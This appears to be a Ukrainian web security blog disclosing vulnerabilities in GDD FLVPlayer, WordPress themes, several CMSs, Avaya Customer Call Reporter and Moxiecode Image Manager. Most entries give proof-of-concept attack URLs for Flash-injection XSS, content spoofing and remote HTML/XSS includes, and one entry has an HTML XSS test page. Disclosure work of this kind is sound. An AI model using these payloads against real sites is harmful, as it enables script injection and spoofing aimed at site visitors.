Websecurity - Веб безпека

В даній добірці уразливості в веб додатках:

• Foscam <= 11.37.2.48 path traversal vulnerability (деталі)
• Multiple Vulnerabilities in Kasseler CMS (деталі)
• Air Drive Plus v2.4 iOS - Arbitrary File Upload Vulnerability (деталі)
• Project Pier Web Vulnerabilities (деталі)
• Privoxy Proxy Authentication Credential Exposure (деталі)

Сьогодні я виявив Content Spoofing, Cross-Site Scripting та Full path disclosure уразливості в темах для WordPress, що містять GDD FLVPlayer.

Раніше я писав про уразливості в GDD FLVPlayer. Це популярна флешка, що знаходиться на тисячах веб сайтів і яка використовується в багатьох веб додатках.

Цей плеєр міститься в багатьох темах (шаблонах) для WordPress. Серед них I Love It (про дірки в цій темі я вже писав), Megusta, Multipress, Lolzine, V1. Та існують інші уразливі теми для WordPress з gddflvplayer.swf.

XSS (через Flash Injection) (WASC-08):

I Love It:

http://site/wp-content/themes/iloveit/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/iloveit/flv/gddflvplayer.swf?splashscreen=xss.swf

Megusta:

http://site/wp-content/themes/megusta/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/megusta/flv/gddflvplayer.swf?splashscreen=xss.swf

Multipress:

http://site/wp-content/themes/multipress/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/multipress/flv/gddflvplayer.swf?splashscreen=xss.swf

Lolzine:

http://site/wp-content/themes/Lolzine/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/Lolzine/flv/gddflvplayer.swf?splashscreen=xss.swf

V1:

http://site/wp-content/themes/v1/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/v1/flv/gddflvplayer.swf?splashscreen=xss.swf

Full path disclosure (WASC-13):

Всі зазначені теми мають FPD уразливості в php-файлах (в index.php та інших), що типово для WP тем.

http://site/wp-content/themes/iloveit/

http://site/wp-content/themes/megusta/

http://site/wp-content/themes/multipress/

http://site/wp-content/themes/Lolzine/

http://site/wp-content/themes/v1/

В останній темі шлях може бути v1, v1.0, v1.3.5 та інші варіанти.

Наведені XSS та FPD уразливості, приклади 8 СS уразливостей дивитися у вищенаведеному записі. Вразливі веб додатки, що використовують GDD FLVPlayer v3.635 і попередні версії.

Вразливі всі версії наступних веб додатків: I Love It, Megusta, Multipress, Lolzine, V1.

Сьогодні я виявив Content Spoofing та Cross-Site Scripting уразливості в численних веб додатках з GDD FLVPlayer.

Раніше я писав про уразливості в GDD FLVPlayer. Це популярна флешка, що знаходиться на тисячах веб сайтів і яка використовується в багатьох веб додатках.

Зокрема в Order Master Pro, CMS Pask (Pixelwerk admin), gddflvplayer для MODx, Pixelfind Administrator, WHMCompleteSolution. Та в інших веб додатках. А також цей флеш відео та аудіо плеєр використовується на багатьох сайтах як самостійний веб додаток.

XSS (через Flash Injection) (WASC-08):

Order Master Pro:

http://site/op/video/gddflvplayer.swf?mylogo=xss.swf
http://site/op/video/gddflvplayer.swf?splashscreen=xss.swf

CMS Pask 3 (Pixelwerk admin):

http://site/gddflvplayer.swf?mylogo=xss.swf
http://site/gddflvplayer.swf?splashscreen=xss.swf

gddflvplayer для MODx:

http://site/assets/snippets/gddflvplayer/gddflvplayer.swf?mylogo=xss.swf
http://site/assets/snippets/gddflvplayer/gddflvplayer.swf?splashscreen=xss.swf

Pixelfind Administrator:

http://site/includes/flash/gddflvplayer.swf?mylogo=xss.swf
http://site/includes/flash/gddflvplayer.swf?splashscreen=xss.swf

WHMCompleteSolution:

http://site/player/gddflvplayer.swf?mylogo=xss.swf
http://site/player/gddflvplayer.swf?splashscreen=xss.swf

Наведені XSS уразливості, приклади 8 СS уразливостей дивитися у вищенаведеному записі. Вразливі веб додатки, що використовують GDD FLVPlayer v3.635 і попередні версії.

Вразливі наступні веб додатки: усі версії Order Master Pro, CMS Pask 3 (Pixelwerk admin v.3.3) і попередні версії, усі версії gddflvplayer для MODx, усі версії Pixelfind Administrator та усі версії WHMCompleteSolution.

10.07.2013

У травні, 16.05.2013, я виявив Content Spoofing та Cross-Site Scripting уразливості в GDD FLVPlayer. Про що найближчим часом повідомлю розробникам веб додатку.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

23.08.2013

Content Spoofing (Flash Injection) (WASC-12):

http://site/gddflvplayer.swf?mylogo=http://site2/1.swf

http://site/gddflvplayer.swf?splashscreen=http://site2/1.swf

Можна включати флешки, в тому числі флешки з лінками.

XSS (через Flash Injection) (WASC-08):

http://site/gddflvplayer.swf?mylogo=xss.swf

http://site/gddflvplayer.swf?splashscreen=xss.swf

В старих версіях флеша атака спрацює з флешкою xss.swf на будь-яких доменах, а в нових версіях - лише на тому самому домені.

Content Spoofing (Content Injection) (WASC-12):

http://site/gddflvplayer.swf?mylogo=http://site2/1.jpg

http://site/gddflvplayer.swf?splashscreen=http://site2/1.jpg

http://site/gddflvplayer.swf?advert=http://site2/1.flv

http://site/gddflvplayer.swf?vdo=http://site2/1.flv

Включення зображень і програш відео та аудіо (flv, mp4 та mp3 файлів) з зовнішніх сайтів.

Content Spoofing (Link Injection) (WASC-12):

http://site/gddflvplayer.swf?clickTAG=http://websecurity.com.ua

http://site/gddflvplayer.swf?vdo=http://site2/1.flv&endclipaction=http://websecurity.com.ua

Уразливі GDD FLVPlayer v3.635 та попередні версії.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Comment Extra Fields, Booking Calendar та Usernoise. Для котрих з’явилися експлоіти. Comment Extra Fields - це плагін для додавання нових полів в форму коментарів, Booking Calendar - це плагін для створення календаря замовлень, Usernoise - це контактна форма.

• WordPress Comment Extra Fields 1.7 CSRF / XSS (деталі)
• Booking Calendar 4.1.4 Cross Site Request Forgery (деталі)
• WordPress Usernoise 3.7.8 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• FOSCAM IP-Cameras Improper Access Restrictions (деталі)
• Multiple CSRF vulnerabilities on Foscam IP cameras web UI (деталі)
• Multiple Vulnerabilities in Exponent CMS (деталі)
• Vulnerabilities in otrs (деталі)
• Multiple Vulnerabilities in OpenX (деталі)

У грудні, 06.12.2012, я знайшов Remote HTML Include та Remote XSS Include (Cross-Site Scripting) уразливості в Avaya IP Office Customer Call Reporter. Про що вже повідомив розробникам.

Спочатку я ще у грудні й січні повідомив ZDI про інші критичні уразливості в цьому продукті Avaya (про них я напишу пізніше, зараз наведу ці дірки). ZDI повільно відповідали і лише робили вигляд, що вони займаються цим питанням, лише у серпні активно взялися за справу, зв’язалися з Avaya, але ті не відповіли, тому ZDI відмовилися займатися цією справою. А у липні я повідомив розробникам (про ці дірки та інші критичні уразливості), але вони проігнорували моє повідомлення.

RHI (Frame Injection) (WASC-12):

http://site/CCRWebClient/Help/en-US/index.htm?//websecurity.com.ua

RXI (Cross-Site Scripting) (WASC-08):

http://site/CCRWebClient/Help/en-US/index.htm?//websecurity.com.ua/webtools/xss_r2.html

Вразливі Avaya IP Office Customer Call Reporter 8.0.9.13, 9.0.0.0 та попередні версії. Торік я перевірив у версії 8.0.9.13, а сьогодні в останній версії 9.0.0.0.

Учора я знайшов Insufficient Anti-automation та Abuse of Functionality уразливості на http://ebay.com - сайті аукціону eBay (зокрема на https://scgi.ebay.com). Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливість на ebay.com.

Детальна інформація про уразливості з’явиться пізніше.

11.06.2013

У квітні, 14.04.2013, я знайшов Content Spoofing, Cross-Site Scripting та Full Path Disclosure уразливості в Moxiecode Image Manager (MCImageManager) для TinyMCE. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в MCImageManager для TinyMCE.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

16.08.2013

Content Spoofing (WASC-12):

Можна вказувати абсолютні URL для включення зовнішніх файлів в флешку на цільовому сайті.

http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.flv
http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?autoStart=false&startImage=1.jpg
http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.flv&autoStart=false&startImage=1.jpg
http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.xml

Через xml-файл, розміщений на поточному чи зовнішньому ресурсі, можна вказувати абсолютні URL для включення зовнішніх файлів в флешку на цільовому сайті (параметри thumbnail та url в xml-файлі приймають довільні адреси).

Файл 1.xml:

<?xml version="1.0" encoding="UTF-8"?>
<playlist>
	<item name="Content Spoofing" thumbnail="1.jpg" url="1.flv"/>
	<item name="Content Spoofing" thumbnail="2.jpg" url="2.flv"/>
</playlist>

XSS (WASC-08):

<html>
<body>
<script>
function flvStart() {
	alert('XSS');
}
function flvEnd() {
	alert('XSS');
}
</script>
<object width="50%" height="50%">
<param name=movie value="flvPlayer.swf?flvToPlay=1.flv&jsCallback=true">
<param name=quality value=high>
<embed src="flvPlayer.swf?flvToPlay=1.flv&jsCallback=true" width="50%" height="50%" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash"></embed>
</object>
</body>
</html>

Якщо на сайті на сторінці з flvPlayer.swf(з параметром jsCallback=true, або якщо є можливість вказати цей параметр для flv_player.swf) є можливість включити JS код з функцією flvStart() і/або flvEnd() (через HTML Injection), то можна провести XSS атаку. Тобто JS-калбеки можна використати для XSS атаки.

Full Path Disclosure (WASC-13):

Повний шлях в кукісах MCManager_im_lastPath і MCManagerHistoryCookie_im.

Вразливі Moxiecode Image Manager 3.1.5 та попередні версії.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах FlagEm, Duplicator та Bit51 Better WP Security. Для котрих з’явилися експлоіти. FlagEm - це плагін для встановлення флагів, Duplicator - це плагін для клонування сайта, Bit51 Better WP Security - це плагін для захисту сайта.

• WordPress FlagEm Cross Site Scripting (деталі)
• WordPress Duplicator 0.4.4 Cross Site Scripting (деталі)
• Bit51 Better WP Security Plugin XSS / Command Execution (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.